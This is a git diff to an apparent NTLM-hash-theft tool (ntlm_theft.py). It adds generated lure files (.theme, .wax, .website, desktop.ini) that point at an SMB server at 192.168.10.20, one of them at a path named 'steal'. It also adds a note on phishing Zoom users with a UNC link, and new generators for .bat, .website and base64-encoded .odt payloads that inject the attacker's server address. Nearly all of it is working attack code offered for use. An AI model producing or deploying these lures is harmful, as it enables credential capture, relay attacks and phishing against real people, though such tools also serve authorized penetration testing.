+SizeAll=\\192.168.10.20\aero_move.cur +SizeNESW=\\192.168.10.20\aero_nesw.cur +SizeNS=\\192.168.10.20\aero_ns.cur +SizeNWSE=\\192.168.10.20\aero_nwse.cur +SizeWE=\\192.168.10.20\aero_ew.cur +UpArrow=\\192.168.10.20\aero_up.cur +Wait=\\192.168.10.20\aero_busy.ani +DefaultValue=Windows Default +DefaultValue.MUI=@main.cpl,-1020 + +[Control Panel\Desktop] +Wallpaper=\\192.168.10.20\setup.exe +TileWallpaper=0 +WallpaperStyle=10 +Pattern= +MultimonBackgrounds=0 + +[VisualStyles] +Path=\\192.168.10.20\Themes\Aero\Aero.msstyles +ColorStyle=NormalColor +Size=NormalSize +AutoColorization=0 +ColorizationColor=0XC40078D4 +SystemMode=Light +AppMode=Light + +[boot] +SCRNSAVE.EXE= + +[MasterThemeSelector] +MTSM=RJSPBS + +[Sounds] +; IDS_SCHEME_DEFAULT +SchemeName=@\\192.168.10.20\setup.dll,-800 + \ No newline at end of file diff --git a/alienkeric/alienkeric.wax b/alienkeric/alienkeric.wax new file mode 100644 index 0000000..c2e8948 --- /dev/null +++ b/alienkeric/alienkeric.wax @@ -0,0 +1,2 @@ +https://192.168.10.20/test +file://\\192.168.10.20/steal/file \ No newline at end of file diff --git a/alienkeric/alienkeric.website b/alienkeric/alienkeric.website new file mode 100644 index 0000000..55762c1 --- /dev/null +++ b/alienkeric/alienkeric.website @@ -0,0 +1,12 @@ +[{000214A0-0000-0000-C000-000000000046}] +Prop3=19,2 +Prop4=31,go.microsoft.com +[InternetShortcut] +URL=file:///192.168.10.20/ +[{A7AF692E-098D-4C08-A225-D433CA835ED0}] +Prop5=3,0 +Prop9=19,0 +Prop2=65,2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF310000002B000000710600006204000056 +Prop6=3,1 +[{9F4C2855-9F79-4B39-A8D0-E1D42DE1D5F3}] +Prop5=8,Microsoft.Website.B4BD2547.99055A5E \ No newline at end of file diff --git a/alienkeric/desktop.ini b/alienkeric/desktop.ini new file mode 100644 index 0000000..143dd6b --- /dev/null +++ b/alienkeric/desktop.ini @@ -0,0 +1,2 @@ +[.ShellClassInfo] +IconResource=\\192.168.10.20\aa \ No newline at end of file diff --git a/alienkeric/zoom-attack-instructions.txt b/alienkeric/zoom-attack-instructions.txt new file mode 100644 index 0000000..4833f2e --- /dev/null +++ b/alienkeric/zoom-attack-instructions.txt @@ -0,0 +1,3 @@ +To attack zoom, just put the following link along with your phishing message in the chat window: + +\\192.168.10.20\xyz diff --git a/ntlm_theft.py b/ntlm_theft.py index b72fb76..4a0fca0 100644 --- a/ntlm_theft.py +++ b/ntlm_theft.py @@ -9,7 +9,7 @@ # Open file and allow: pdf # Browser download and open: .application (Must be downloaded via a web browser and run) # Partial Open file: .m3u (Works if you open with windows media player, but windows 10 auto opens with groove music) - +# # In progress - desktop.ini (Need to test older windows versions), autorun.ini (Need to test before windows 7), scf (Need to test on older windows) @@ -25,6 +25,8 @@ # https://web.archive.org/web/20190106181024/https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.LIBRARY-MS-FILETYPE-INFORMATION-DISCLOSURE.txt import argparse +import base64 +import zipfile import io import os import shutil @@ -67,7 +69,14 @@ "zoom", "libraryms", "autoruninf", - "desktopini")), + "bat", + "desktopini", + "website", ## done-dev + "odt", ##done-dev + "zip", ##dev_time&testing(3days) + "pptx", ##dev_time&testing(3days) + "theme")), ##dev_time&testing(3days) + help='Choose to generate all files or a specific filetype') parser.add_argument('-s', '--server',action='store', dest='server',required=True, help='The IP address of your SMB hash capture server (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, etc)') @@ -75,6 +84,44 @@ help='The base filename without extension, can be renamed later (test, Board-Meeting2020, Bonus_Payment_Q4)') args = parser.parse_args() +##ntlm theft with .odt +def create_odt(generate, server, filename): + # b64 encoded part1 + contentxml1 = "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4NCjxvZmZpY2U6ZG9jdW1lbnQtY29udGVudCB4bWxuczpvZmZpY2U9InVybjpvYXNpczpuYW1lczp0YzpvcGVuZG9jdW1lbnQ6eG1sbnM6b2ZmaWNlOjEuMCIgeG1sbnM6c3R5bGU9InVybjpvYXNpczpuYW1lczp0YzpvcGVuZG9jdW1lbnQ6eG1sbnM6c3R5bGU6MS4wIiB4bWxuczp0ZXh0PSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOnRleHQ6MS4wIiB4bWxuczp0YWJsZT0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczp0YWJsZToxLjAiIHhtbG5zOmRyYXc9InVybjpvYXNpczpuYW1lczp0YzpvcGVuZG9jdW1lbnQ6eG1sbnM6ZHJhd2luZzoxLjAiIHhtbG5zOmZvPSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOnhzbC1mby1jb21wYXRpYmxlOjEuMCIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6bWV0YT0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczptZXRhOjEuMCIgeG1sbnM6bnVtYmVyPSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOmRhdGFzdHlsZToxLjAiIHhtbG5zOnN2Zz0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczpzdmctY29tcGF0aWJsZToxLjAiIHhtbG5zOmNoYXJ0PSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOmNoYXJ0OjEuMCIgeG1sbnM6ZHIzZD0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczpkcjNkOjEuMCIgeG1sbnM6bWF0aD0iaHR0cDovL3d3dy53My5vcmcvMTk5OC9NYXRoL01hdGhNTCIgeG1sbnM6Zm9ybT0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczpmb3JtOjEuMCIgeG1sbnM6c2NyaXB0PSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOnNjcmlwdDoxLjAiIHhtbG5zOm9vbz0iaHR0cDovL29wZW5vZmZpY2Uub3JnLzIwMDQvb2ZmaWNlIiB4bWxuczpvb293PSJodHRwOi8vb3Blbm9mZmljZS5vcmcvMjAwNC93cml0ZXIiIHhtbG5zOm9vb2M9Imh0dHA6Ly9vcGVub2ZmaWNlLm9yZy8yMDA0L2NhbGMiIHhtbG5zOmRvbT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS94bWwtZXZlbnRzIiB4bWxuczp4Zm9ybXM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDIveGZvcm1zIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczpycHQ9Imh0dHA6Ly9vcGVub2ZmaWNlLm9yZy8yMDA1L3JlcG9ydCIgeG1sbnM6b2Y9InVybjpvYXNpczpuYW1lczp0YzpvcGVuZG9jdW1lbnQ6eG1sbnM6b2Y6MS4yIiB4bWxuczp4aHRtbD0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCIgeG1sbnM6Z3JkZGw9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvZy9kYXRhLXZpZXcjIiB4bWxuczpvZmZpY2Vvb289Imh0dHA6Ly9vcGVub2ZmaWNlLm9yZy8yMDA5L29mZmljZSIgeG1sbnM6dGFibGVvb289Imh0dHA6Ly9vcGVub2ZmaWNlLm9yZy8yMDA5L3RhYmxlIiB4bWxuczpkcmF3b29vPSJodHRwOi8vb3Blbm9mZmljZS5vcmcvMjAxMC9kcmF3IiB4bWxuczpjYWxjZXh0PSJ1cm46b3JnOmRvY3VtZW50Zm91bmRhdGlvbjpuYW1lczpleHBlcmltZW50YWw6Y2FsYzp4bWxuczpjYWxjZXh0OjEuMCIgeG1sbnM6bG9leHQ9InVybjpvcmc6ZG9jdW1lbnRmb3VuZGF0aW9uOm5hbWVzOmV4cGVyaW1lbnRhbDpvZmZpY2U6eG1sbnM6bG9leHQ6MS4wIiB4bWxuczpmaWVsZD0idXJuOm9wZW5vZmZpY2U6bmFtZXM6ZXhwZXJpbWVudGFsOm9vby1tcy1pbnRlcm9wOnhtbG5zOmZpZWxkOjEuMCIgeG1sbnM6Zm9ybXg9InVybjpvcGVub2ZmaWNlOm5hbWVzOmV4cGVyaW1lbnRhbDpvb3htbC1vZGYtaW50ZXJvcDp4bWxuczpmb3JtOjEuMCIgeG1sbnM6Y3NzM3Q9Imh0dHA6Ly93d3cudzMub3JnL1RSL2NzczMtdGV4dC8iIG9mZmljZTp2ZXJzaW9uPSIxLjIiPjxvZmZpY2U6c2NyaXB0cy8+PG9mZmljZTpmb250LWZhY2UtZGVjbHM+PHN0eWxlOmZvbnQtZmFjZSBzdHlsZTpuYW1lPSJMdWNpZGEgU2FuczEiIHN2Zzpmb250LWZhbWlseT0iJmFwb3M7THVjaWRhIFNhbnMmYXBvczsiIHN0eWxlOmZvbnQtZmFtaWx5LWdlbmVyaWM9InN3aXNzIi8+PHN0eWxlOmZvbnQtZmFjZSBzdHlsZTpuYW1lPSJMaWJlcmF0aW9uIFNlcmlmIiBzdmc6Zm9udC1mYW1pbHk9IiZhcG9zO0xpYmVyYXRpb24gU2VyaWYmYXBvczsiIHN0eWxlOmZvbnQtZmFtaWx5LWdlbmVyaWM9InJvbWFuIiBzdHlsZTpmb250LXBpdGNoPSJ2YXJpYWJsZSIvPjxzdHlsZTpmb250LWZhY2Ugc3R5bGU6bmFtZT0iTGliZXJhdGlvbiBTYW5zIiBzdmc6Zm9udC1mYW1pbHk9IiZhcG9zO0xpYmVyYXRpb24gU2FucyZhcG9zOyIgc3R5bGU6Zm9udC1mYW1pbHktZ2VuZXJpYz0ic3dpc3MiIHN0eWxlOmZvbnQtcGl0Y2g9InZhcmlhYmxlIi8+PHN0eWxlOmZvbnQtZmFjZSBzdHlsZTpuYW1lPSJMdWNpZGEgU2FucyIgc3ZnOmZvbnQtZmFtaWx5PSImYXBvcztMdWNpZGEgU2FucyZhcG9zOyIgc3R5bGU6Zm9udC1mYW1pbHktZ2VuZXJpYz0ic3lzdGVtIiBzdHlsZTpmb250LXBpdGNoPSJ2YXJpYWJsZSIvPjxzdHlsZTpmb250LWZhY2Ugc3R5bGU6bmFtZT0iTWljcm9zb2Z0IFlhSGVpIiBzdmc6Zm9udC1mYW1pbHk9IiZhcG9zO01pY3Jvc29mdCBZYUhlaSZhcG9zOyIgc3R5bGU6Zm9udC1mYW1pbHktZ2VuZXJpYz0ic3lzdGVtIiBzdHlsZTpmb250LXBpdGNoPSJ2YXJpYWJsZSIvPjxzdHlsZTpmb250LWZhY2Ugc3R5bGU6bmFtZT0iU2ltU3VuIiBzdmc6Zm9udC1mYW1pbHk9IlNpbVN1biIgc3R5bGU6Zm9udC1mYW1pbHktZ2VuZXJpYz0ic3lzdGVtIiBzdHlsZTpmb250LXBpdGNoPSJ2YXJpYWJsZSIvPjwvb2ZmaWNlOmZvbnQtZmFjZS1kZWNscz48b2ZmaWNlOmF1dG9tYXRpYy1zdHlsZXM+PHN0eWxlOnN0eWxlIHN0eWxlOm5hbWU9ImZyMSIgc3R5bGU6ZmFtaWx5PSJncmFwaGljIiBzdHlsZTpwYXJlbnQtc3R5bGUtbmFtZT0iT0xFIj48c3R5bGU6Z3JhcGhpYy1wcm9wZXJ0aWVzIHN0eWxlOmhvcml6b250YWwtcG9zPSJjZW50ZXIiIHN0eWxlOmhvcml6b250YWwtcmVsPSJwYXJhZ3JhcGgiIGRyYXc6b2xlLWRyYXctYXNwZWN0PSIxIi8+PC9zdHlsZTpzdHlsZT48L29mZmljZTphdXRvbWF0aWMtc3R5bGVzPjxvZmZpY2U6Ym9keT48b2ZmaWNlOnRleHQ+PHRleHQ6c2VxdWVuY2UtZGVjbHM+PHRleHQ6c2VxdWVuY2UtZGVjbCB0ZXh0OmRpc3BsYXktb3V0bGluZS1sZXZlbD0iMCIgdGV4dDpuYW1lPSJJbGx1c3RyYXRpb24iLz48dGV4dDpzZXF1ZW5jZS1kZWNsIHRleHQ6ZGlzcGxheS1vdXRsaW5lLWxldmVsPSIwIiB0ZXh0Om5hbWU9IlRhYmxlIi8+PHRleHQ6c2VxdWVuY2UtZGVjbCB0ZXh0OmRpc3BsYXktb3V0bGluZS1sZXZlbD0iMCIgdGV4dDpuYW1lPSJUZXh0Ii8+PHRleHQ6c2VxdWVuY2UtZGVjbCB0ZXh0OmRpc3BsYXktb3V0bGluZS1sZXZlbD0iMCIgdGV4dDpuYW1lPSJEcmF3aW5nIi8+PC90ZXh0OnNlcXVlbmNlLWRlY2xzPjx0ZXh0OnAgdGV4dDpzdHlsZS1uYW1lPSJTdGFuZGFyZCIvPjx0ZXh0OnAgdGV4dDpzdHlsZS1uYW1lPSJTdGFuZGFyZCI+PGRyYXc6ZnJhbWUgZHJhdzpzdHlsZS1uYW1lPSJmcjEiIGRyYXc6bmFtZT0iT2JqZWN0MSIgdGV4dDphbmNob3ItdHlwZT0icGFyYWdyYXBoIiBzdmc6d2lkdGg9IjE0LjEwMWNtIiBzdmc6aGVpZ2h0PSI5Ljk5OWNtIiBkcmF3OnotaW5kZXg9IjAiPjxkcmF3Om9iamVjdCB4bGluazpocmVmPSJmaWxlOi8v" + contentxml3 = "L3Rlc3QuanBnIiB4bGluazp0eXBlPSJzaW1wbGUiIHhsaW5rOnNob3c9ImVtYmVkIiB4bGluazphY3R1YXRlPSJvbkxvYWQiLz48ZHJhdzppbWFnZSB4bGluazpocmVmPSIuL09iamVjdFJlcGxhY2VtZW50cy9PYmplY3QgMSIgeGxpbms6dHlwZT0ic2ltcGxlIiB4bGluazpzaG93PSJlbWJlZCIgeGxpbms6YWN0dWF0ZT0ib25Mb2FkIi8+PC9kcmF3OmZyYW1lPjwvdGV4dDpwPjwvb2ZmaWNlOnRleHQ+PC9vZmZpY2U6Ym9keT48L29mZmljZTpkb2N1bWVudC1jb250ZW50Pg==" + + # decode part1 and inject ip + part1 = base64.b64decode(contentxml1).decode("utf-8") + part2 = base64.b64decode(contentxml3).decode("utf-8") + fileout = part1 + server + part2 + + # write content.xml + with open("content.xml", "w", encoding="utf-8") as f: + f.write(fileout) + + #odt need ezodf, create blank one + try: + from ezodf import newdoc + except ImportError: + raise ImportError("Missing `ezodf`. Install with:\n pip install ezodf") + + temp_odt = "temp.odt" + odt = newdoc(doctype='odt', filename=temp_odt) + odt.save() + + #rebuild the file with the malicious injected ip on content.xml + with zipfile.ZipFile(temp_odt, 'r') as zin, zipfile.ZipFile(filename, 'w') as zout: + for item in zin.infolist(): + if item.filename != 'content.xml': + zout.writestr(item, zin.read(item.filename)) + + with zipfile.ZipFile(filename, 'a') as zf: + zf.write("content.xml", arcname="content.xml") + + #remove content.xml + os.remove("content.xml") + os.remove(temp_odt) + print(f"Created: {filename} (Open in LibreOffice / OpenOffice)") # NOT WORKING ON LATEST WINDOWS # .scf remote IconFile Attack @@ -100,6 +147,14 @@ def create_url_url(generate,server,filename): file.close() print("Created: " + filename + " (BROWSE TO FOLDER)") +## .bat remote url attack +def create_bat(generate, server, filename): + with open(filename, 'w') as file: + file.write( + f'@echo off\n' + f'start "" "\\\\{server}\\share"\n' + ) + print("Created: " + filename + " (BROWSE TO FOLDER)") # .url remote IconFile attack # Filename: shareattack.url, action=browse, attacks=explorer @@ -497,6 +552,7 @@ def create_desktopini(generate,server,filename): file.close() print("Created: " + filename + " (BROWSE TO FOLDER)") +## .libraryms file creation def create_libraryms(generate,server,filename): file = open(filename,'w') file.write(''' @@ -531,7 +587,6 @@ def create_libraryms(generate,server,filename): file.close() print("Created: " + filename + " (BROWSE TO FOLDER)") - # .lnk remote IconFile Attack # Filename: shareattack.lnk, action=browse, attacks=explorer def create_lnk(generate,server,filename): @@ -551,6 +606,23 @@ def create_lnk(generate,server,filename): file.write(bytes(shortcut)) print("Created: " + filename + " (BROWSE TO FOLDER)") +## .website remote attack +def create_website(generate, server, filename): + with open(filename, "w") as file: + file.write(f"""[{{000214A0-0000-0000-C000-000000000046}}] +Prop3=19,2 +Prop4=31,go.microsoft.com +[InternetShortcut] +URL=file:///{server}/ +[{{A7AF692E-098D-4C08-A225-D433CA835ED0}}] +Prop5=3,0 +Prop9=19,0 +Prop2=65,2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF310000002B000000710600006204000056 +Prop6=3,1 +[{{9F4C2855-9F79-4B39-A8D0-E1D42DE1D5F3}}] +Prop5=8,Microsoft.Website.B4BD2547.99055A5E""") + file.close() + print(f"Created: {filename} (BROWSE TO FOLDER)") # create folder to hold templates, if already exists delete it if os.path.exists(args.filename): @@ -604,6 +676,13 @@ def create_lnk(generate,server,filename): create_theme(args.generate, args.server, os.path.join(args.filename, args.filename + ".theme")) + create_bat(args.generate, args.server, os.path.join(args.filename, args.filename + ".bat")) + + create_website(args.generate, args.server, os.path.join(args.filename, args.filename + ".website")) + + create_odt(args.generate, args.server, os.path.join(args.filename, args.filename + ".odt")) + + elif(args.generate == "scf"): create_scf(args.generate, args.server, os.path.join(args.filename, args.filename + ".scf")) @@ -665,4 +744,13 @@ def create_lnk(generate,server,filename): elif(args.generate == "theme"): create_theme(args.generate, args.server, os.path.join(args.filename, args.filename + ".theme")) +elif(args.generate == "bat"): + create_bat(args.generate, args.server, os.path.join(args.filename, args.filename + ".bat")) + +elif(args.generate == "website"): + create_website(args.generate, args.server, os.path.join(args.filename, args.filename + ".website")) + +elif(args.generate == "odt"): + create_odt(args.generate, args.server, os.path.join(args.filename, args.filename + ".odt")) + print("Generation Complete.") diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..a44e69c --- /dev/null +++ b/requirements.txt @@ -0,0 +1,3 @@ +xlsxwriter +ezodf +lxml